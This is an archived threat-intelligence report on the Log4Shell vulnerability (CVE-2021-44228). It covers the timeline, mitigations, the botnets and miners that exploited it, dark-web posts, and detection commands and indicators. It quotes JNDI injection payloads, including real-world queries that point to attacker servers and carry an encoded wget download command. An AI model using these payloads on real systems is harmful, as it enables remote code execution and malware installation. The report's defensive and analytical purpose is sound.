{ "id": "9d622232-48b4-4a1d-85f9-cd0d86769ebd", "created_at": "2026-04-06T00:11:08.119584Z", "updated_at": "2026-04-10T13:12:34.573774Z", "deleted_at": null, "sha1_hash": "f983d1466408a000852e96c87551e7ea1c61ecd1", "title": "Logs of Log4shell (CVE-2021-44228): log4j is ubiquitous [EN]", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3913070, "plain_text": "Logs of Log4shell (CVE-2021-44228): log4j is ubiquitous [EN]\r\nBy S2W\r\nPublished: 2021-12-23 · Archived: 2026-04-05 23:05:34 UTC\r\n12 min read\r\nDec 14, 2021\r\nAuthor: TALON | S2W\r\nLast Modified: 12/14/2021\r\nPress enter or click to view image in full size\r\nPhoto by NASA on Unsplash\r\nExecutive Summary\r\nVulnerability information discovered in log4j, a library used for Java logging, was disclosed and we analyzed it.\r\nThis report contains contents such as vulnerability-related posts on the darkweb and domestic and international\r\ncurrent responses, and the S2W’s vulnerability analysis report was delivered exclusively to our customers through\r\nthe Xarvis solution.\r\nVulnerability (CVE-2021-44228, log4shell)\r\nhttps://logging.apache.org/log4j/2.x/security.html\r\nhttps://issues.apache.org/jira/browse/LOG4J2-3201\r\nhttps://github.com/apache/logging-log4j2/pull/608\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 1 of 18\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\r\nLog4shell-related timeline (Summary version)\r\n(2021.12.09.) log4shell disclosed on Twitter\r\nhttps://twitter.com/P0rZ9/status/1468949890571337731\r\n(2021.12.09.) Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package\r\n(2021.12.10.) Security advisories for services affected by this vulnerability, such as Apple, Amazon,\r\nCloudflare, Minecraft, Steam, Tesla, Twitter, and Baidu\r\n(2021.12.11.) Tweeted that Alibaba Cloud Security reported the vulnerability in November.\r\n(2021.12.12.) 151 vendors issued related security advisories\r\nImplications\r\nSoftware vulnerabilities can occur at any time, and if a ubiquitous open source such as log4j is used, it is\r\nnecessary to prepare in advance to tackle potential vulnerabilities when they occur.\r\nPeriodic asset identification is required for services used by internal infrastructures.\r\nMalware and attacks by exploiting vulnerabilities\r\nThere are cases of distribution of Mirai, Kinsing, and Muhstik that exploit the unpatched vulnerability.\r\nIn addition, spray-and-pray type of attack attempts is continuously occurring.\r\nPosts related to the log4j vulnerability mentioned in DDW (Deep \u0026 Darkweb)\r\nIt was mentioned on a darkweb forum that users who uploaded leaked information from Tencent Cloud and\r\nAlibaba Cloud utilized the log4j vulnerability several times to attack Chinese-related companies.\r\nActionable Items (Appendix)\r\nAppendix.A: log4j RCE attack detection method and list of public detection tools\r\nAppendix.B: IoC and malware related to the vulnerability\r\nAppendix.C: Detection ruleset (Yara, Snort, Sigma)\r\nAppendix.D: Affected service information\r\nAppendix.E: About 151 Service Vendor Security Advisories (2021.12.12.)\r\nAppendix.F: Posts mentioned on the Deep \u0026 Dark Web\r\nSummary of CVE-2021-44228 (Log4shell)\r\nlog4j is an open-source Java logging library and is used by most projects running in Java.\r\nVersions affected by this vulnerability: Apache log4j 2.0 ~ 2.14.1\r\nIf you are using an affected version, see Appendix.A : How to detect log4j RCE attacks\r\nA brief summary of how vulnerabilities are triggered\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 2 of 18\n\n1) Send the payload with ${jndi:ldap://[ATTACKER_SERVER/MALICIOUS_CLASS} as request\r\n2) The server creates the request specified in the JNDI interface\r\n3) An adversary can perform an attack by uploading an malicious Java class to the request\r\nExample of the attack packet\r\nExample of the attack packet\r\nMitigation\r\n1) update to log4j 2.15.0 or 2.15.0-RC2 version\r\nDownload\r\nhttps://logging.apache.org/log4j/2.x/download.html\r\n2) For versions 2.10.0 and later, set the formatMsgNoLookups property to True\r\nCommandline\r\necho “export LOG4J_FORMAT_MSG_NO_LOOKUPS=true” \u003e\u003e /etc/profile.d/blockzero.sh\r\n3) Versions below 2.10.0 change log string pattern or remove JndiLookup class from the path\r\nCommandline\r\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\r\nTimeline\r\n(2013.07.17.) the code that caused the vulnerability updated to the repository [1]\r\n(2021.11.26.) Register for Miter CVE [2]\r\n(2021.11.29.) Creating Jira tickets related to the vulnerability [3]\r\n(2021.11.30.) Start patching work in the Github repository [4]\r\n(2021.12.01.) First exploit seen by Cloudflare\r\n(2021.12.05.) Patch commit [5]\r\n(2021.12.06.) Patch announcement[6]\r\n(2021.12.09.) PoC disclosure\r\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/ [7]\r\n(2021.12.10.) Minecraft target attack detected [8]\r\n(2021.12.10.) Various services such as Apple, Amazon, Cloudflare, Minecraft, Steam, Tesla, Twitter, and\r\nBaidu are said to be affected by the vulnerability. [9]\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 3 of 18\n\n(2021.12.11.) Alibaba Cloud Security reported the vulnerability in November. [10]\r\n(2021.12.12.) Notice of security advisories related to 151 vendors — see Appendix.E\r\nRedistributing the updated patch on December 10 due to an incomplete patch released on December 6\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 4 of 18\n\nTimeline\r\nImplications\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 5 of 18\n\nSource: https://xkcd.com/2347/\r\nCharacteristics of open-source\r\nAlthough it has been used in many commercial services, it is a project operated by about 3 or 4 main\r\ncontributors, and it is judged that the verification and security of the code itself are not systematically\r\nperformed compared to the impact of the library. However, in case of log4j, the response was pretty rapid.\r\nKudos to maintainers!\r\nThe JNDI Injection attack technique used in this vulnerability was already announced at Black\r\nHat in 2016. [12]\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 6 of 18\n\n1) The attacker binds the payload to his(er) Naming/Directory service.\r\n2) Inject URLs into vulnerable JNDI lookup methods\r\n3) Perform lookup inside the application\r\n4) The application connects to an attacker-controlled Naming/Directory service\r\n5) Finally, the application decodes the response and triggers the payload.\r\nThe need for internal asset identification\r\nUnlike the installation of commercial software and services, the identification of assets using such an open-source project has problems with issue tracking and is difficult to be well-managed.\r\nAdvance preparation required\r\nSoftware vulnerabilities can occur at any time, and if a ubiquitous open source such as log4j is used, it is\r\nnecessary to prepare in advance to tackle potential vulnerabilities when they occur.\r\nPeriodic asset identification is required for services used by internal infrastructures.\r\nThere is a need to automate tracking of specific open-source usage and notification of vulnerabilities.\r\nRelated Malware\r\nFor detailed IoC information related to the below malware, refer to Appendix.B\r\n1. Download command\r\nWe confirmed that the distribution of malware is in two types through the CVE-2021-44228. It can be getting\r\nvarious.\r\n${jndi:ldap://[ATTACKER_SERVER]/Basic/Command/Base64/[BASE64_CODE]\r\nExample of malicious query\r\n${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb\r\n${jndi:ldap://[ATTACKER_SERVER]/[MALICIOUS_CLASS]\r\nExample of malicious query\r\n${jndi:ldap://45.83.193.150:1389/Exploit}\r\n2. Types of distributed malware\r\nMirai\r\nMirai was first distributed in 2016 and is a botnet distributed to IoT devices.\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 7 of 18\n\nThe infected system receives and executes commands from the C\u0026C server, and is mainly used for DDoS\r\nattacks.\r\nKinsing\r\nKinsing is a Golang-based malware that spreads Miner.\r\nThere is a case of distributing malware targeting vulnerable Docker\r\nInstall Monero miner on the infected system and worm that spreads malware inside.\r\nMuhstik\r\nMuhstik distributes Miner targeting IoT devices and servers.\r\nInstall Monero miner and receive commands from IRC server to perform malicious actions\r\nTrending posts on Deep \u0026 Dark Web\r\nFor details of the log4j related posts mentioned on the Deep \u0026 Dark Web, see Appendix.F\r\n1. Sharing Apache log4j vulnerability and PoC code\r\n(2021.12.10.) OO00O0000 in Raidforums mentioned that the scope of Apache log4j-related vulnerabilities and the\r\nexpected damage is similar to the 2017 EternalBlue issue.\r\nIt was mentioned that more than 90% of application platforms developed based on Java are affected, along\r\nwith the content that the target server can be remotely controlled by exploiting this vulnerability.\r\n(2021.12.10.) Lipshitz in XSS wrote a thread to share vulnerability information, stating that the Minecraft\r\nserver and many versions of Apache are affected by CVE-2021-44228.\r\n(2021.12.10.) Kelegen in XSS shared a GitHub link [13] where he posted information about currently\r\nattackable products and services.\r\n(2021.12.10.) Nowheretogo , Moderator of RAMP, explained the log4j and mentioned the fact that the CVE-2021-40228 has been exploited since December 9, 2021.\r\n(2021.12.11.) l1nux in RAMP shared the operation results disclosed on Twitter [14] with the statement\r\nthat the vulnerability works in VMWare vCenter.\r\n(2021.12.11.) varwar in RAMP mentioned that vulnerability also works in Ghidra and shared the results\r\nof the operation on Twitter [15], and in the comment, it said that Ghidra is currently patched and\r\nvulnerability is not working anymore.\r\n2. Sharing Attack Use Cases\r\n(2021.12.10.) AgainstTheWest in Raidforums who uploaded leaked information related to Tencent Cloud and\r\nAlibaba Cloud , used the log4j vulnerability several times to attack Chinese-related companies\r\nGet S2W’s stories in your inbox\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 8 of 18\n\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\n(2021.12.11.) PwnSec in XSS shared a GitHub repo [16] containing the PoC code for CVE-2021-44228, along\r\nwith a telegram channel sharing information about the new 0day RCE vulnerability.\r\nAs a result of checking the Telegram channel shared by the author of the post, the proof image of testing\r\nthe PoC code in iCloud , Tesla , Amazon (CN), Baidu , Linkedin , Cloudflare , Twitter ,\r\nMinecraft , and Elastic related services along with information on the PoC code share\r\nAppendix: Actionable Items\r\nAppendix.A: log4j RCE attack detection method and the list of public detection tools\r\nDetection method in /var/log: Basic command\r\nNot compressed case\r\nsudo egrep -I -i -r ‘\\$(\\{|%7B)jndi:(ldap[s]?|rmi|dns):/[^\\n]+’ /var/logCompressed case\r\nsudo find /var/log -name \\*.gz -print0 | xargs -0 zgrep -E -i '\\$(\\{|%7B)jndi:(ldap[s]?|rmi|dns):/[^\\\r\nDetection method in /var/log : Obfuscated or mutated instructions\r\nNot compressed case\r\nsudo find /var/log/ -type f -exec sh -c \"cat {} | sed -e 's/\\${lower://'g | tr -d '}' | egrep -I -i\r\nsudo find /var/log/ -name \"*.log.gz\" -type f -exec sh -c \"zcat {} | sed -e 's/\\${lower://'g | tr -d\r\nS/W check command exposed to the vulnerability\r\nWindows: Powershell command\r\ngci 'C:\\' -rec -force -include *.jar -ea 0 | foreach {select-string \"JndiLookup.class\" $_} | select -\r\nfind / 2\u003e/dev/null -regex \".*.jar\" -type f | xargs -I{} grep JndiLookup.class \"{}\"\r\nDetection tools\r\nhttps://labrador.iotcube.com/scanner/LabradorLog4ShellDetector.jar\r\nAppendix.B: IoC related with CVE-2021-44228\r\nUSER-AGENT HTTP HEADER\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 9 of 18\n\nIP\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 10 of 18\n\nKINSING MINING ACTIVITY\r\nMIRAI INFECTION ACTIVITY\r\nMUHSTICK INFECTION ACTIVITY\r\nMIRAI INFECTION OTHER HASHES\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 11 of 18\n\nObserved Domains\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 12 of 18\n\nLinux Botnets (MIRAI / Muhstik)\r\n→ MIRAI\r\n→ Muhstik =\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 13 of 18\n\nThe above IoC was written by referring to many sites mentioned in Related IoCs in References at the bottom\r\nof the report, and the relevant IoC is constantly being updated.\r\nIf you need to check only the IoC listed in this report, you can check it in the Google Docs below.\r\nAppendix.C: Detection ruleset (Yara, Snort, Sigma)\r\n1. Yara rule\r\n2. Snort rule (Emergingthreat Open Rules)\r\n3. Sigma rule\r\nAppendix.D: Affected Software \u0026 Verified (version of 2021. 12. 13.) [18]\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 14 of 18\n\nAppendix.E: Log4Shell(CVE-2021-44228) Security Advisories\r\nPlease refer to the spreadsheet for the detailed advisory\r\n→ [S2W] Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)\r\nAkamai, Apache Druid, Apache Flink, Apache LOG4J, Apache Kafka, Apache Solr, Apero CAS, APPSHEET, Apt\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 15 of 18\n\nAppendix.F: Status of Deep \u0026 Darkweb Posts\r\n1. Raidforums\r\nlog4j, log4shell search results (1 post)\r\n→ Apache Log4j explodes with high-risk vulnerabilities comparable to “eternal blue”, ne\r\nPost date: 2021.12.10.\r\nAuthor: OO00O0OO0\r\nPress enter or click to view image in full size\r\nAnalysis\r\nThe author of the post stated that the scope of Apache log4j-related vulnerabilities and the degree of\r\nexpected damage are similar to the 2017 EternalBlue.\r\nIt is mentioned that more than 90% of application platforms developed based on Java are affected, along\r\nwith the content that the server can be remotely controlled by exploiting this vulnerability.\r\nAgainstTheWest in Raidforums who uploaded leaked information related to Tencent Cloud and\r\nAlibaba Cloud , used the log4j vulnerability several times to attack Chinese-related companies\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 16 of 18\n\n2. XSS\r\nlog4j, log4shell search results (2 posts)\r\n→ 0day Log4j RCE Vulnerability ! ( 2021-44228 )\r\nPost date: 2021.12.11.\r\nAuthor: PwnSec\r\nPress enter or click to view image in full size\r\nAnalysis\r\nAs a result of checking the Telegram channel shared by the author of the post, the proof image of testing\r\nthe PoC code in iCloud , Tesla , Amazon (CN), Baidu , Linkedin , Cloudflare , Twitter ,\r\nMinecraft , and Elastic related services along with information on the PoC code share\r\n→ CVE-2021-44228 Apache log4j RCE\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 17 of 18\n\nPost date: 2021.12.11.\r\nAuthor: Lipshitz\r\nAnalysis\r\n(2021.12.10.) Lipshitz in XSS wrote a thread to share vulnerability information, stating that the Minecraft\r\nserver and many versions of Apache are affected by CVE-2021-44228.\r\n(2021.12.10.) Kelegen in XSS shared a GitHub link [13] where he posted information about currently\r\nattackable products and services.\r\nPress enter or click to view image in full size\r\n(2021.12.12.) Lipshitz in XSS shares code information available on Cloudflare.\r\nPress enter or click to view image in full size\r\nSource: https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039" ], "report_names": [ "logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039" ], "threat_actors": [ { "id": "05b0c294-6e79-4d58-8291-73d2c1c7d9bd", "created_at": "2024-06-25T02:00:05.048321Z", "updated_at": "2026-04-10T02:00:03.665219Z", "deleted_at": null, "main_name": "BlueHornet", "aliases": [ "APT49", "AgainstTheWest" ], "source_name": "MISPGALAXY:BlueHornet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3", "created_at": "2023-01-06T13:46:39.390649Z", "updated_at": "2026-04-10T02:00:03.311299Z", "deleted_at": null, "main_name": "Kinsing", "aliases": [ "Money Libra" ], "source_name": "MISPGALAXY:Kinsing", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434268, "ts_updated_at": 1775826754, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f983d1466408a000852e96c87551e7ea1c61ecd1.pdf", "text": "https://archive.orkl.eu/f983d1466408a000852e96c87551e7ea1c61ecd1.txt", "img": "https://archive.orkl.eu/f983d1466408a000852e96c87551e7ea1c61ecd1.jpg" } }